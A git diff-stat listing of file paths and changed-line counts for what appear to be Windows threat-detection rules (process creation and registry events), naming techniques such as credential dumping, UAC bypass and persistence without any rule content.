.../proc_creation_win_pua_system_informer.yml | 28 +- ...oc_creation_win_pua_webbrowserpassview.yml | 9 +- ..._creation_win_pua_wsudo_susp_execution.yml | 14 +- .../proc_creation_win_python_adidnsdump.yml | 9 +- ...on_win_python_inline_command_execution.yml | 20 +- .../proc_creation_win_python_pty_spawn.yml | 10 +- .../proc_creation_win_query_session_exfil.yml | 5 +- .../proc_creation_win_rar_compress_data.yml | 7 +- ...tion_win_rar_compression_with_password.yml | 8 +- ...eation_win_rar_susp_greedy_compression.yml | 18 +- .../proc_creation_win_rasdial_execution.yml | 3 +- ...eation_win_rdrleakdiag_process_dumping.yml | 23 +- .../proc_creation_win_reg_add_run_key.yml | 8 +- 
.../proc_creation_win_reg_add_safeboot.yml | 16 +- .../proc_creation_win_reg_bitlocker.yml | 7 +- ..._credential_access_via_password_filter.yml | 5 +- ...oc_creation_win_reg_defender_exclusion.yml | 8 +- .../proc_creation_win_reg_delete_safeboot.yml | 14 +- .../proc_creation_win_reg_delete_services.yml | 12 +- ...tion_win_reg_desktop_background_change.yml | 39 +- ...direct_asep_registry_keys_modification.yml | 12 +- ..._creation_win_reg_disable_sec_services.yml | 9 +- ...eation_win_reg_dumping_sensitive_hives.yml | 46 +- ...numeration_for_credentials_in_registry.yml | 30 +- ...n_win_reg_import_from_suspicious_paths.yml | 15 +- ...n_win_reg_lsa_disable_restricted_admin.yml | 20 +- ...on_win_reg_lsa_ppl_protection_disabled.yml | 11 +- .../proc_creation_win_reg_machineguid.yml | 2 +- ...n_win_reg_modify_group_policy_settings.yml | 15 +- .../proc_creation_win_reg_nolmhash.yml | 16 +- .../proc_creation_win_reg_open_command.yml | 9 +- .../proc_creation_win_reg_query_registry.yml | 14 +- .../proc_creation_win_reg_rdp_keys_tamper.yml | 14 +- .../proc_creation_win_reg_screensaver.yml | 28 +- ...ation_win_reg_service_imagepath_change.yml | 16 +- ...oc_creation_win_reg_software_discovery.yml | 14 +- .../proc_creation_win_reg_susp_paths.yml | 10 +- .../proc_creation_win_reg_volsnap_disable.yml | 2 +- ...eation_win_reg_windows_defender_tamper.yml | 21 +- ...reg_write_protect_for_storage_disabled.yml | 8 +- ...m_regsvcs_uncommon_extension_execution.yml | 22 +- ...sm_regsvcs_uncommon_location_execution.yml | 24 +- ...ation_win_regedit_export_critical_keys.yml | 14 +- .../proc_creation_win_regedit_export_keys.yml | 16 +- .../proc_creation_win_regedit_import_keys.yml | 14 +- ...c_creation_win_regedit_import_keys_ads.yml | 14 +- .../proc_creation_win_regini_ads.yml | 13 +- .../proc_creation_win_regini_execution.yml | 13 +- ...tion_win_registry_cimprovider_dll_load.yml | 2 +- ...gistry_enumeration_for_credentials_cli.yml | 9 +- ...urity_zone_protocol_defaults_downgrade.yml | 14 +- 
...registry_install_reg_debugger_backdoor.yml | 7 +- ...roc_creation_win_registry_logon_script.yml | 12 +- ...tion_win_registry_new_network_provider.yml | 15 +- ...y_privilege_escalation_via_service_key.yml | 7 +- ...gistry_provlaunch_provisioning_command.yml | 17 +- ...egistry_set_unsecure_powershell_policy.yml | 19 +- ...n_win_registry_typed_paths_persistence.yml | 5 +- ...oc_creation_win_regsvr32_flags_anomaly.yml | 7 +- ..._creation_win_regsvr32_http_ip_pattern.yml | 9 +- ..._creation_win_regsvr32_network_pattern.yml | 15 +- ...roc_creation_win_regsvr32_remote_share.yml | 7 +- ...eation_win_regsvr32_susp_child_process.yml | 6 +- ...creation_win_regsvr32_susp_exec_path_1.yml | 16 +- ...creation_win_regsvr32_susp_exec_path_2.yml | 27 +- ..._creation_win_regsvr32_susp_extensions.yml | 15 +- ...proc_creation_win_regsvr32_susp_parent.yml | 14 +- ...eation_win_regsvr32_uncommon_extension.yml | 26 +- ...win_remote_access_software_ultraviewer.yml | 22 +- ...eation_win_remote_access_tools_anydesk.yml | 28 +- ...s_tools_anydesk_piped_password_via_cli.yml | 6 +- ...te_access_tools_anydesk_silent_install.yml | 7 +- ..._remote_access_tools_anydesk_susp_exec.yml | 28 +- ...ion_win_remote_access_tools_gotoopener.yml | 22 +- ...eation_win_remote_access_tools_logmein.yml | 22 +- ...ion_win_remote_access_tools_netsupport.yml | 24 +- ...mote_access_tools_netsupport_susp_exec.yml | 13 +- ...ccess_tools_rurat_non_default_location.yml | 11 +- ..._win_remote_access_tools_screenconnect.yml | 22 +- ...mote_access_tools_screenconnect_access.yml | 5 +- ...ote_access_tools_screenconnect_anomaly.yml | 3 +- ...access_tools_screenconnect_remote_exec.yml | 11 +- ...roc_creation_win_remote_time_discovery.yml | 11 +- .../proc_creation_win_renamed_adfind.yml | 18 +- .../proc_creation_win_renamed_autohotkey.yml | 39 +- .../proc_creation_win_renamed_autoit.yml | 31 +- .../proc_creation_win_renamed_binary.yml | 13 +- ...ion_win_renamed_binary_highly_relevant.yml | 75 +- 
.../proc_creation_win_renamed_browsercore.yml | 3 +- .../proc_creation_win_renamed_cloudflared.yml | 10 +- .../proc_creation_win_renamed_createdump.yml | 23 +- .../proc_creation_win_renamed_curl.yml | 7 +- .../proc_creation_win_renamed_dctask64.yml | 3 +- .../proc_creation_win_renamed_ftp.yml | 3 +- .../proc_creation_win_renamed_gpg4win.yml | 3 +- .../proc_creation_win_renamed_jusched.yml | 3 +- .../proc_creation_win_renamed_mavinject.yml | 5 +- .../proc_creation_win_renamed_megasync.yml | 3 +- ...oc_creation_win_renamed_netsupport_rat.yml | 11 +- ..._creation_win_renamed_office_processes.yml | 36 +- .../proc_creation_win_renamed_paexec.yml | 40 +- .../proc_creation_win_renamed_pingcastle.yml | 59 +- .../proc_creation_win_renamed_plink.yml | 10 +- .../proc_creation_win_renamed_pressanykey.yml | 7 +- ...win_renamed_rundll32_dllregisterserver.yml | 10 +- .../proc_creation_win_renamed_rurat.yml | 3 +- ...tion_win_renamed_sysinternals_procdump.yml | 14 +- ...in_renamed_sysinternals_psexec_service.yml | 3 +- ...ation_win_renamed_sysinternals_sdelete.yml | 3 +- .../proc_creation_win_renamed_vmnat.yml | 3 +- .../proc_creation_win_renamed_whoami.yml | 3 +- ...reation_win_rpcping_credential_capture.yml | 29 +- ...tion_win_ruby_inline_command_execution.yml | 9 +- ..._win_rundll32_ads_stored_dll_execution.yml | 12 +- ...ndll32_advpack_obfuscated_ordinal_call.yml | 19 +- .../proc_creation_win_rundll32_by_ordinal.yml | 17 +- .../proc_creation_win_rundll32_inline_vbs.yml | 5 +- ...eation_win_rundll32_installscreensaver.yml | 9 +- ...ion_win_rundll32_js_runhtmlapplication.yml | 7 +- .../proc_creation_win_rundll32_keymgr.yml | 9 +- ...win_rundll32_mshtml_runhtmlapplication.yml | 10 +- .../proc_creation_win_rundll32_no_params.yml | 5 +- .../proc_creation_win_rundll32_ntlmrelay.yml | 11 +- ...n_win_rundll32_obfuscated_ordinal_call.yml | 8 +- ..._creation_win_rundll32_parent_explorer.yml | 12 +- ..._win_rundll32_process_dump_via_comsvcs.yml | 23 +- 
...on_win_rundll32_registered_com_objects.yml | 8 +- ...oc_creation_win_rundll32_run_locations.yml | 27 +- .../proc_creation_win_rundll32_script_run.yml | 9 +- ...n_rundll32_setupapi_installhinfsection.yml | 10 +- ...on_win_rundll32_shell32_susp_execution.yml | 8 +- ...rundll32_shelldispatch_potential_abuse.yml | 9 +- ...c_creation_win_rundll32_spawn_explorer.yml | 3 +- ...oc_creation_win_rundll32_susp_activity.yml | 162 +- ...ion_win_rundll32_susp_control_dll_load.yml | 9 +- ...32_susp_execution_with_image_extension.yml | 13 +- ..._win_rundll32_susp_shellexec_execution.yml | 12 +- ...tion_win_rundll32_susp_shimcache_flush.yml | 11 +- .../proc_creation_win_rundll32_sys.yml | 7 +- .../proc_creation_win_rundll32_unc_path.yml | 11 +- ...on_win_rundll32_uncommon_dll_extension.yml | 17 +- .../proc_creation_win_rundll32_user32_dll.yml | 14 +- ...n_win_rundll32_webdav_client_execution.yml | 16 +- ..._rundll32_webdav_client_susp_execution.yml | 24 +- ...eation_win_rundll32_without_parameters.yml | 5 +- .../proc_creation_win_runonce_execution.yml | 11 +- ..._change_sevice_image_path_by_non_admin.yml | 7 +- .../proc_creation_win_sc_create_service.yml | 6 +- .../proc_creation_win_sc_disable_service.yml | 11 +- ...proc_creation_win_sc_new_kernel_driver.yml | 4 +- .../proc_creation_win_sc_query.yml | 11 +- ...ion_win_sc_sdset_allow_service_changes.yml | 28 +- ...ation_win_sc_sdset_deny_service_access.yml | 31 +- ...roc_creation_win_sc_sdset_hide_sevices.yml | 23 +- ...roc_creation_win_sc_sdset_modification.yml | 17 +- ...ation_win_sc_service_path_modification.yml | 9 +- ..._win_sc_service_tamper_for_persistence.yml | 38 +- .../proc_creation_win_sc_stop_service.yml | 21 +- ...tion_win_schtasks_appdata_local_system.yml | 11 +- .../proc_creation_win_schtasks_change.yml | 21 +- .../proc_creation_win_schtasks_creation.yml | 4 +- ...tion_win_schtasks_creation_temp_folder.yml | 5 +- .../proc_creation_win_schtasks_delete.yml | 16 +- .../proc_creation_win_schtasks_delete_all.yml | 6 +- 
.../proc_creation_win_schtasks_disable.yml | 12 +- .../proc_creation_win_schtasks_env_folder.yml | 40 +- ...oc_creation_win_schtasks_folder_combos.yml | 13 +- ...c_creation_win_schtasks_guid_task_name.yml | 10 +- ...n_schtasks_one_time_only_midnight_task.yml | 11 +- .../proc_creation_win_schtasks_parent.yml | 10 +- ...schtasks_persistence_windows_telemetry.yml | 20 +- ...on_win_schtasks_powershell_persistence.yml | 11 +- .../proc_creation_win_schtasks_reg_loader.yml | 22 +- ...eation_win_schtasks_reg_loader_encoded.yml | 21 +- ...oc_creation_win_schtasks_schedule_type.yml | 19 +- ...tion_win_schtasks_schedule_type_system.yml | 22 +- ...asks_schedule_via_masqueraded_xml_file.yml | 18 +- ...roc_creation_win_schtasks_susp_pattern.yml | 23 +- .../proc_creation_win_schtasks_system.yml | 22 +- ..._creation_win_sdbinst_shim_persistence.yml | 22 +- ...oc_creation_win_sdbinst_susp_extension.yml | 37 +- .../proc_creation_win_sdclt_child_process.yml | 3 +- ...roc_creation_win_sdiagnhost_susp_child.yml | 7 +- .../proc_creation_win_secedit_execution.yml | 13 +- ..._creation_win_servu_susp_child_process.yml | 8 +- ...oc_creation_win_setspn_spn_enumeration.yml | 12 +- .../proc_creation_win_shutdown_execution.yml | 2 +- .../proc_creation_win_shutdown_logoff.yml | 2 +- ...eation_win_sndvol_susp_child_processes.yml | 5 +- ...eation_win_soundrecorder_audio_capture.yml | 2 +- ...proc_creation_win_splwow64_cli_anomaly.yml | 2 +- ...ation_win_spoolsv_susp_child_processes.yml | 19 +- ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 7 +- .../proc_creation_win_sqlcmd_veeam_dump.yml | 2 +- ...ation_win_sqlite_chromium_profile_data.yml | 25 +- ..._win_sqlite_firefox_gecko_profile_data.yml | 15 +- .../proc_creation_win_squirrel_download.yml | 25 +- ..._creation_win_squirrel_proxy_execution.yml | 37 +- .../proc_creation_win_ssh_port_forward.yml | 2 +- .../proc_creation_win_ssh_rdp_tunneling.yml | 9 +- .../proc_creation_win_ssm_agent_abuse.yml | 5 +- ...eation_win_stordiag_susp_child_process.yml 
| 5 +- ...oc_creation_win_susp_16bit_application.yml | 4 +- ...ation_win_susp_abusing_debug_privilege.yml | 20 +- ...on_win_susp_add_user_local_admin_group.yml | 25 +- ...win_susp_add_user_remote_desktop_group.yml | 25 +- ...eation_win_susp_alternate_data_streams.yml | 15 +- ...ays_install_elevated_windows_installer.yml | 12 +- .../proc_creation_win_susp_appx_execution.yml | 13 +- ...ary_shell_execution_via_settingcontent.yml | 8 +- ...reation_win_susp_archiver_iso_phishing.yml | 8 +- ...creation_win_susp_automated_collection.yml | 9 +- ...n_susp_bad_opsec_sacrificial_processes.yml | 37 +- ...tion_win_susp_child_process_as_system_.yml | 16 +- ...n_win_susp_cli_obfuscation_escape_char.yml | 7 +- ...ation_win_susp_cli_obfuscation_unicode.yml | 54 +- ...usp_commandline_path_traversal_evasion.yml | 11 +- ...oc_creation_win_susp_copy_browser_data.yml | 50 +- ...reation_win_susp_copy_lateral_movement.yml | 43 +- ...proc_creation_win_susp_copy_system_dir.yml | 41 +- ...eation_win_susp_copy_system_dir_lolbin.yml | 32 +- ...creation_win_susp_crypto_mining_monero.yml | 6 +- ...ion_win_susp_data_exfiltration_via_cli.yml | 57 +- ...proc_creation_win_susp_disable_raccine.yml | 9 +- ...roc_creation_win_susp_double_extension.yml | 13 +- ...ation_win_susp_double_extension_parent.yml | 80 +- ...eation_win_susp_download_office_domain.yml | 30 +- ...reation_win_susp_dumpstack_log_evasion.yml | 2 +- ...on_win_susp_elavated_msi_spawned_shell.yml | 16 +- ...reation_win_susp_electron_app_children.yml | 33 +- ...tion_win_susp_electron_exeuction_proxy.yml | 61 +- ..._elevated_system_shell_uncommon_parent.yml | 44 +- .../proc_creation_win_susp_embed_exe_lnk.yml | 5 +- ...tion_win_susp_etw_modification_cmdline.yml | 6 +- ...oc_creation_win_susp_etw_trace_evasion.yml | 23 +- .../proc_creation_win_susp_eventlog_clear.yml | 25 +- ...eation_win_susp_eventlog_content_recon.yml | 44 +- ..._susp_execution_from_guid_folder_names.yml | 21 +- ...execution_from_public_folder_as_parent.yml | 5 +- 
.../proc_creation_win_susp_execution_path.yml | 40 +- ...tion_win_susp_execution_path_webserver.yml | 3 +- ...creation_win_susp_file_characteristics.yml | 6 +- ...win_susp_gather_network_info_execution.yml | 13 +- ...n_win_susp_hidden_dir_index_allocation.yml | 14 +- ...in_susp_hiding_malware_in_fonts_folder.yml | 10 +- ...win_susp_homoglyph_cyrillic_lookalikes.yml | 118 +- .../proc_creation_win_susp_image_missing.yml | 24 +- ...ation_win_susp_inline_base64_mz_header.yml | 4 +- ...reation_win_susp_inline_win_api_access.yml | 13 +- ...p_local_system_owner_account_discovery.yml | 33 +- ..._win_susp_lolbin_exec_from_non_c_drive.yml | 53 +- ...eation_win_susp_lsass_dmp_cli_keywords.yml | 52 +- ...tion_win_susp_ms_appinstaller_download.yml | 13 +- ...proc_creation_win_susp_network_command.yml | 5 +- ...oc_creation_win_susp_network_scan_loop.yml | 8 +- ...roc_creation_win_susp_network_sniffing.yml | 17 +- .../proc_creation_win_susp_non_exe_image.yml | 24 +- ...c_creation_win_susp_non_priv_reg_or_ps.yml | 11 +- .../proc_creation_win_susp_ntds.yml | 57 +- ...creation_win_susp_nteventlogfile_usage.yml | 11 +- ..._win_susp_ntfs_short_name_path_use_cli.yml | 42 +- ...in_susp_ntfs_short_name_path_use_image.yml | 40 +- ...ation_win_susp_ntfs_short_name_use_cli.yml | 20 +- ...ion_win_susp_ntfs_short_name_use_image.yml | 10 +- ...eation_win_susp_obfuscated_ip_download.yml | 32 +- ...reation_win_susp_obfuscated_ip_via_cli.yml | 30 +- ..._creation_win_susp_office_token_search.yml | 10 +- .../proc_creation_win_susp_parents.yml | 15 +- ...in_susp_priv_escalation_via_named_pipe.yml | 21 +- ...c_creation_win_susp_private_keys_recon.yml | 32 +- ...susp_privilege_escalation_cli_patterns.yml | 9 +- ...oc_creation_win_susp_proc_wrong_parent.yml | 16 +- .../proc_creation_win_susp_progname.yml | 31 +- .../proc_creation_win_susp_recon.yml | 25 +- ...on_win_susp_recycle_bin_fake_execution.yml | 8 +- ...on_win_susp_redirect_local_admin_share.yml | 7 +- 
...tion_win_susp_remote_desktop_tunneling.yml | 8 +- ...eation_win_susp_right_to_left_override.yml | 12 +- ...n_win_susp_script_exec_from_env_folder.yml | 25 +- ...reation_win_susp_script_exec_from_temp.yml | 8 +- ...roc_creation_win_susp_service_creation.yml | 15 +- .../proc_creation_win_susp_service_tamper.yml | 69 +- ...eation_win_susp_shadow_copies_creation.yml | 25 +- ...eation_win_susp_shadow_copies_deletion.yml | 53 +- ...tion_win_susp_shell_spawn_susp_program.yml | 11 +- .../proc_creation_win_susp_sysnative.yml | 7 +- ...c_creation_win_susp_system_exe_anomaly.yml | 23 +- ..._creation_win_susp_system_user_anomaly.yml | 104 +- .../proc_creation_win_susp_sysvol_access.yml | 2 +- ..._creation_win_susp_task_folder_evasion.yml | 17 +- .../proc_creation_win_susp_use_of_te_bin.yml | 17 +- ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 13 +- .../proc_creation_win_susp_userinit_child.yml | 6 +- ...tion_win_susp_weak_or_abused_passwords.yml | 9 +- ...n_win_susp_web_request_cmd_and_cmdlets.yml | 20 +- ...proc_creation_win_susp_whoami_as_param.yml | 5 +- ...in_svchost_execution_with_no_cli_flags.yml | 14 +- ...eation_win_svchost_termserv_proc_spawn.yml | 5 +- ...on_win_svchost_uncommon_parent_process.yml | 2 +- ...sinternals_accesschk_check_permissions.yml | 21 +- ..._win_sysinternals_adexplorer_execution.yml | 13 +- ...sysinternals_adexplorer_susp_execution.yml | 17 +- ...reation_win_sysinternals_eula_accepted.yml | 9 +- ...tion_win_sysinternals_livekd_execution.yml | 8 +- ...sysinternals_livekd_kernel_memory_dump.yml | 13 +- ...tion_win_sysinternals_procdump_evasion.yml | 18 +- ...eation_win_sysinternals_procdump_lsass.yml | 14 +- ...tion_win_sysinternals_psexec_execution.yml | 4 +- ...nternals_psexec_paexec_escalate_system.yml | 25 +- ...n_sysinternals_psexec_remote_execution.yml | 6 +- ...roc_creation_win_sysinternals_psexesvc.yml | 11 +- ...on_win_sysinternals_psexesvc_as_system.yml | 14 +- ...oc_creation_win_sysinternals_psloglist.yml | 19 +- 
...oc_creation_win_sysinternals_psservice.yml | 11 +- ...n_win_sysinternals_pssuspend_execution.yml | 15 +- ..._sysinternals_pssuspend_susp_execution.yml | 18 +- ...proc_creation_win_sysinternals_sdelete.yml | 2 +- ..._sysinternals_susp_psexec_paexec_flags.yml | 22 +- ..._win_sysinternals_sysmon_config_update.yml | 14 +- ...tion_win_sysinternals_sysmon_uninstall.yml | 16 +- ...on_win_sysinternals_tools_masquerading.yml | 5 +- .../proc_creation_win_sysprep_appdata.yml | 8 +- ...proc_creation_win_systeminfo_execution.yml | 4 +- ...ettingsadminflows_turn_on_dev_features.yml | 15 +- ...roc_creation_win_takeown_recursive_own.yml | 5 +- ...proc_creation_win_tapinstall_execution.yml | 3 +- .../proc_creation_win_tar_compression.yml | 12 +- .../proc_creation_win_tar_extraction.yml | 12 +- .../proc_creation_win_taskkill_sep.yml | 17 +- ..._creation_win_tasklist_basic_execution.yml | 10 +- .../proc_creation_win_taskmgr_localsystem.yml | 2 +- ...ms_suspicious_command_line_cred_access.yml | 12 +- ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 2 +- .../proc_creation_win_tscon_localsystem.yml | 2 +- .../proc_creation_win_tscon_rdp_redirect.yml | 2 +- ...eation_win_tscon_rdp_session_hijacking.yml | 4 +- .../proc_creation_win_uac_bypass_cleanmgr.yml | 5 +- .../proc_creation_win_uac_bypass_cmstp.yml | 9 +- ...win_uac_bypass_cmstp_com_object_access.yml | 13 +- ...eation_win_uac_bypass_computerdefaults.yml | 3 +- ...eation_win_uac_bypass_consent_comctl32.yml | 3 +- .../proc_creation_win_uac_bypass_dismhost.yml | 3 +- ...on_win_uac_bypass_eventvwr_recentviews.yml | 9 +- ...proc_creation_win_uac_bypass_fodhelper.yml | 3 +- ...n_uac_bypass_hijacking_firwall_snap_in.yml | 3 +- ...roc_creation_win_uac_bypass_icmluautil.yml | 4 +- ...c_creation_win_uac_bypass_msconfig_gui.yml | 2 +- ...tion_win_uac_bypass_ntfs_reparse_point.yml | 12 +- ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 3 +- .../proc_creation_win_uac_bypass_sdclt.yml | 3 +- .../proc_creation_win_uac_bypass_winsat.yml | 3 +- 
.../proc_creation_win_uac_bypass_wmp.yml | 6 +- .../proc_creation_win_uac_bypass_wsreset.yml | 14 +- .../proc_creation_win_ultravnc.yml | 12 +- ...c_creation_win_ultravnc_susp_execution.yml | 6 +- ...ation_win_uninstall_crowdstrike_falcon.yml | 8 +- ..._win_userinit_uncommon_child_processes.yml | 30 +- .../proc_creation_win_vaultcmd_list_creds.yml | 9 +- .../proc_creation_win_verclsid_runs_com.yml | 6 +- ...proc_creation_win_virtualbox_execution.yml | 11 +- ...n_win_virtualbox_vboxdrvinst_execution.yml | 15 +- ...ion_win_vmware_toolbox_cmd_persistence.yml | 13 +- ...in_vmware_toolbox_cmd_persistence_susp.yml | 16 +- ...win_vmware_vmtoolsd_susp_child_process.yml | 45 +- ...n_win_vscode_child_processes_anomalies.yml | 11 +- ...c_creation_win_vscode_tunnel_execution.yml | 11 +- ...eation_win_vscode_tunnel_remote_shell_.yml | 9 +- ...on_win_vscode_tunnel_renamed_execution.yml | 16 +- ...tion_win_vscode_tunnel_service_install.yml | 2 +- ...tion_win_vsdiagnostics_execution_proxy.yml | 11 +- ..._win_vslsagent_agentextensionpath_load.yml | 7 +- .../proc_creation_win_w32tm.yml | 9 +- ...ab_execution_from_non_default_location.yml | 3 +- .../proc_creation_win_wab_unusual_parents.yml | 10 +- ...n_win_wbadmin_delete_systemstatebackup.yml | 13 +- ...proc_creation_win_webdav_lnk_execution.yml | 6 +- .../proc_creation_win_webshell_chopper.yml | 9 +- .../proc_creation_win_webshell_hacking.yml | 53 +- ..._webshell_recon_commands_and_processes.yml | 87 +- ...ll_susp_process_spawned_from_webserver.yml | 19 +- .../proc_creation_win_webshell_tool_recon.yml | 11 +- ...reation_win_werfault_lsass_shtinkering.yml | 18 +- ...ion_win_werfault_reflect_debugger_exec.yml | 14 +- ...creation_win_wermgr_susp_child_process.yml | 7 +- ...creation_win_wermgr_susp_exec_location.yml | 7 +- ...c_creation_win_wget_download_direct_ip.yml | 17 +- ...get_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_where_browser_data_recon.yml | 22 +- ...proc_creation_win_whoami_all_execution.yml | 6 +- 
.../proc_creation_win_whoami_execution.yml | 7 +- ...hoami_execution_from_high_priv_process.yml | 11 +- ...c_creation_win_whoami_groups_discovery.yml | 10 +- .../proc_creation_win_whoami_output.yml | 12 +- ...roc_creation_win_whoami_parent_anomaly.yml | 10 +- ...roc_creation_win_whoami_priv_discovery.yml | 10 +- ...ion_win_windows_terminal_susp_children.yml | 58 +- ..._creation_win_winget_add_custom_source.yml | 14 +- ..._win_winget_add_insecure_custom_source.yml | 23 +- ...tion_win_winget_add_susp_custom_source.yml | 17 +- ..._win_winget_local_install_via_manifest.yml | 24 +- ...oc_creation_win_winrar_exfil_dmp_files.yml | 20 +- ...creation_win_winrar_susp_child_process.yml | 41 +- ...n_win_winrar_uncommon_folder_execution.yml | 16 +- .../proc_creation_win_winrm_awl_bypass.yml | 10 +- ..._execution_via_scripting_api_winrm_vbs.yml | 10 +- ...inrm_remote_powershell_session_process.yml | 8 +- ..._creation_win_winrm_susp_child_process.yml | 3 +- ...eation_win_winzip_password_compression.yml | 9 +- ..._wmi_backdoor_exchange_transport_agent.yml | 2 +- ..._wmi_persistence_script_event_consumer.yml | 4 +- ...eation_win_wmic_eventconsumer_creation.yml | 5 +- ...c_creation_win_wmic_namespace_defender.yml | 9 +- ...roc_creation_win_wmic_process_creation.yml | 13 +- ...creation_win_wmic_recon_computersystem.yml | 9 +- ...proc_creation_win_wmic_recon_csproduct.yml | 9 +- .../proc_creation_win_wmic_recon_group.yml | 20 +- .../proc_creation_win_wmic_recon_hotfix.yml | 10 +- .../proc_creation_win_wmic_recon_process.yml | 13 +- .../proc_creation_win_wmic_recon_product.yml | 9 +- ..._creation_win_wmic_recon_product_class.yml | 9 +- .../proc_creation_win_wmic_recon_service.yml | 28 +- ...on_win_wmic_recon_system_info_uncommon.yml | 24 +- ...win_wmic_recon_unquoted_service_search.yml | 17 +- ...roc_creation_win_wmic_remote_execution.yml | 16 +- ...creation_win_wmic_service_manipulation.yml | 8 +- ...oc_creation_win_wmic_squiblytwo_bypass.yml | 27 +- 
...wmic_susp_execution_via_office_process.yml | 32 +- ...reation_win_wmic_susp_process_creation.yml | 12 +- ...reation_win_wmic_terminate_application.yml | 13 +- ...reation_win_wmic_uninstall_application.yml | 10 +- ...n_win_wmic_uninstall_security_products.yml | 17 +- ...reation_win_wmic_xsl_script_processing.yml | 25 +- ...creation_win_wmiprvse_spawning_process.yml | 18 +- ...reation_win_wmiprvse_spawns_powershell.yml | 23 +- ...tion_win_wmiprvse_susp_child_processes.yml | 23 +- ...ation_win_wpbbin_potential_persistence.yml | 6 +- ...eation_win_wscript_cscript_script_exec.yml | 24 +- ...n_wscript_cscript_susp_child_processes.yml | 25 +- ...script_cscript_uncommon_extension_exec.yml | 19 +- ...tion_win_wsl_child_processes_anomalies.yml | 9 +- ...proc_creation_win_wsl_lolbin_execution.yml | 28 +- ...ion_win_wsl_windows_binaries_execution.yml | 5 +- .../proc_creation_win_wuauclt_dll_loading.yml | 30 +- ...ion_win_wuauclt_no_cli_flags_execution.yml | 12 +- ...creation_win_wusa_cab_files_extraction.yml | 9 +- ...a_cab_files_extraction_from_susp_paths.yml | 9 +- ...reation_win_wusa_susp_parent_execution.yml | 30 +- .../proc_tampering_susp_process_hollowing.yml | 6 +- ..._susp_disk_access_using_uncommon_tools.yml | 6 +- .../registry_add_malware_netwire.yml | 3 +- .../registry_add_malware_ursnif.yml | 2 +- ...egistry_add_persistence_amsi_providers.yml | 8 +- ...gistry_add_persistence_com_key_linking.yml | 4 +- ...persistence_disk_cleanup_handler_entry.yml | 20 +- ...e_logon_scripts_userinitmprlogonscript.yml | 8 +- ...dd_pua_sysinternals_execution_via_eula.yml | 5 +- ...ysinternals_renamed_execution_via_eula.yml | 16 +- ...a_sysinternals_susp_execution_via_eula.yml | 19 +- ...delete_exploit_guard_protected_folders.yml | 9 +- .../registry_delete_mstsc_history_cleared.yml | 7 +- ...istry_delete_removal_amsi_registry_key.yml | 9 +- ...ete_removal_com_hijacking_registry_key.yml | 20 +- ...asks_hide_task_via_index_value_removal.yml | 14 +- 
...chtasks_hide_task_via_sd_value_removal.yml | 9 +- ...registry_event_apt_oceanlotus_registry.yml | 3 + .../registry_event_apt_oilrig_mar18.yml | 18 +- .../registry_event_bypass_via_wsreset.yml | 4 +- ...stry_event_cmstp_execution_by_registry.yml | 3 +- ...y_events_logging_adding_reg_key_minint.yml | 11 +- ...event_disable_wdigest_credential_guard.yml | 11 +- ...entutl_volume_shadow_copy_service_keys.yml | 6 +- ...t_hybridconnectionmgr_svc_installation.yml | 5 +- .../registry_event_mal_flowcloud.yml | 10 +- ...registry_event_malware_qakbot_registry.yml | 3 +- ...gistry_event_mimikatz_printernightmare.yml | 9 +- ...y_event_modify_screensaver_binary_path.yml | 5 +- ...ry_event_narrator_feedback_persistance.yml | 3 +- ..._dll_added_to_appcertdlls_registry_key.yml | 16 +- ...dll_added_to_appinit_dlls_registry_key.yml | 17 +- .../registry_event_office_test_regadd.yml | 3 +- ...event_office_trust_record_modification.yml | 7 +- ...registry_event_persistence_recycle_bin.yml | 4 +- .../registry_event_portproxy_registry_key.yml | 3 +- .../registry_event_runkey_winekey.yml | 6 +- .../registry_event_runonce_persistence.yml | 9 +- ...try_event_shell_open_keys_manipulation.yml | 11 +- ...registry_event_silentprocessexit_lsass.yml | 7 +- .../registry_event_ssp_added_lsa_config.yml | 3 +- ...registry_event_stickykey_like_backdoor.yml | 4 +- .../registry_event_susp_atbroker_change.yml | 3 +- .../registry_event_susp_download_run_key.yml | 3 +- .../registry_event_susp_lsass_dll_load.yml | 3 +- .../registry_event_susp_mic_cam_access.yml | 6 +- ...gistry_set_enable_anonymous_connection.yml | 3 +- ...stry_set_add_load_service_in_safe_mode.yml | 3 +- .../registry_set_add_port_monitor.yml | 15 +- .../registry_set_aedebug_persistence.yml | 7 +- ...et_allow_rdp_remote_assistance_feature.yml | 3 +- .../registry_set_amsi_com_hijack.yml | 6 +- ...set_asep_reg_keys_modification_classes.yml | 13 +- ..._set_asep_reg_keys_modification_common.yml | 32 +- 
...eg_keys_modification_currentcontrolset.yml | 14 +- ...p_reg_keys_modification_currentversion.yml | 55 +- ...eg_keys_modification_currentversion_nt.yml | 34 +- ...eg_keys_modification_internet_explorer.yml | 12 +- ..._set_asep_reg_keys_modification_office.yml | 16 +- ..._reg_keys_modification_session_manager.yml | 15 +- ...p_reg_keys_modification_system_scripts.yml | 12 +- ...et_asep_reg_keys_modification_winsock2.yml | 21 +- ...asep_reg_keys_modification_wow6432node.yml | 32 +- ..._keys_modification_wow6432node_classes.yml | 12 +- ...odification_wow6432node_currentversion.yml | 18 +- .../registry_set_bginfo_custom_db.yml | 6 +- .../registry_set_bginfo_custom_vbscript.yml | 11 +- .../registry_set_bginfo_custom_wmi_query.yml | 11 +- .../registry_set_blackbyte_ransomware.yml | 3 +- ...istry_set_bypass_uac_using_eventviewer.yml | 3 +- ...et_bypass_uac_using_silentcleanup_task.yml | 4 +- .../registry_set_change_rdp_port.yml | 13 +- .../registry_set_change_security_zones.yml | 11 +- ...stry_set_change_sysmon_driver_altitude.yml | 4 +- ...gistry_set_change_winevt_channelaccess.yml | 10 +- .../registry_set_chrome_extension.yml | 212 +- .../registry_set_clickonce_trust_prompt.yml | 3 +- ...stry_set_cobaltstrike_service_installs.yml | 12 +- ...istry_set_creation_service_susp_folder.yml | 16 +- ...y_set_creation_service_uncommon_folder.yml | 22 +- ...try_set_cve_2020_1048_new_printer_port.yml | 3 +- ...gistry_set_cve_2022_30190_msdt_follina.yml | 3 +- ...try_set_dbgmanageddebugger_persistence.yml | 10 +- .../registry_set_defender_exclusions.yml | 4 +- ...registry_set_desktop_background_change.yml | 25 +- ...pervisorenforcedcodeintegrity_disabled.yml | 7 +- .../registry_set_dhcp_calloutdll.yml | 4 +- ...istry_set_disable_administrative_share.yml | 4 +- ...gistry_set_disable_autologger_sessions.yml | 